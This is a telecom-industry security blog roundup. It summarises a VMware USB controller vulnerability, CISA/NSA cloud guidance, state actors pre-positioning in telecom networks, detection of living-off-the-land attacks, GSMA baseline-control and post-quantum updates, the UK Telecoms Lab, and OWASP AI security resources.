Mobile Telecom Security Landscape Blog: June 24

This blog post discusses virtualisation security, ‘living off the land’ attacks, GSMA’s recent update to its baseline controls, an approach to security testing, the artificial intelligence exchange and post-quantum telco network activity.

VMware ESXi, Workstation, and Fusion contain a vulnerability[1] in the XHCI USB controller.  VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.3 for Workstation/Fusion and in the Important severity range with a maximum CVSSv3 base score of 8.4 for ESXi. A security fix has been made available and a prompt response is advised.  VMware ESXi provides a bare-metal hypervisor (ie it sits between the hardware and the operating system) that has direct access to and control of underlying resources.  A hypervisor is a type of virtualisation software that supports the creation and management of virtual machines (VMs) by separating a computer’s software from its hardware. 

The US Cybersecurity & Infrastructure Security Agency (CISA) and the National Security Agency (NSA) recently released five joint Cybersecurity Information Sheets (CSIs) that aim to provide organisations with best practices and/or mitigations to improve their cloud security.

A report[2] earlier this year highlighted that state-sponsored cyber actors are seeking to pre-position themselves on telecom networks for later disruptive or destructive cyberattacks.  The report documented how hackers were inside Ukrainian telecoms giant Kyivstar’s system from at least May last year.  A later attack disabled services for some 24 million users for a number of days from 12 December. 

A type of tradecraft known as ‘living off the land’ (LOTL) involves the abuse of native tools and processes on systems and allows attackers to operate discreetly.  Malicious activity aims to blend in with legitimate system and network behaviour, and the lack of conventional indicators of compromise (IOCs) associated with the activity makes it difficult for operators to detect, allowing for long-term undiscovered persistence.  Part of this challenge is in identifying a relatively small volume of malicious activity within large volumes of log data.  This persistent access can allow for data extraction, traffic monitoring, and later destructive attacks that can disable services.

The release of a joint guide[3] for network defenders focuses on how to mitigate identified gaps and how defensive ‘blue’ teams can proactively detect and hunt for LOTL activity through activities such as conducting behavioural analytics, anomaly detection, and proactive hunting.  Other guidance includes hardening systems, tuning end-point detection systems, network segmentation, operating least privilege and establishing and maintaining baselines of network, user, administrative, and application activity.

GSMA’s Baseline Controls guidelines, FS.31[4], have benefitted from a significant update.  FS.31 outlines a recommended set of security controls, which map to threats described in FS30 (a GSMA-member document), that network operators should consider deploying along with references to relevant standards and other best practice resources. The solution description for each control identifies specific advice that allows the operator to fulfil the control objectives. The changes include the addition of new controls pertaining to edge computing, network function virtualisation, network slicing and network orchestration. In total, 85 new controls have been added, and guidance has been enhanced for 29 solutions.

The UK Telecoms Lab (UKTL) is a telecoms security lab, established by the UK Government Department for Science, Innovation and Technology (DSIT) and operated by the National Physical Laboratory (NPL). This is a national facility, located in Solihull, and aims to provide test and evaluation capability to enhance confidence in the resilience and security of telecoms systems deployed in the UK.  The UKTL has been established to support the UK government’s security and diversification policy and to assist the UK supply chain diversification ambitions. It is anticipated that some form of international cooperation will be established.

The OWASP Artificial Intelligence Exchange (AI)[5] provides an open-sourced discussion on the security of AI. It is an open, collaborative project that aims to advance the development of AI security standards and regulations (by providing an overview of AI threats, vulnerabilities and controls). Large Language Models AI Cybersecurity & Governance Checklist[6], The OWASP Top 10 for LLMs[7] is a list of the most critical vulnerabilities found in applications utilising LLMs.

GSMA’s Post Quantum Telco Networks group have released their latest whitepaper, PQ.03 Post Quantum Cryptography – Guidelines for Telecom Use Cases[8].  The scope of this document is to provide a set of best practice guidelines that can be used to support the journey to quantum safe cryptography in the context of the telecom ecosystem.  The work builds directly on the outcome of the first impact assessment whitepaper[9] and takes into consideration the risk assessment framework(s) being adopted by the wider industry and the implementation roadmap for post-quantum cryptography.

If you’d like to discuss or to get more closely involved, please email [email protected].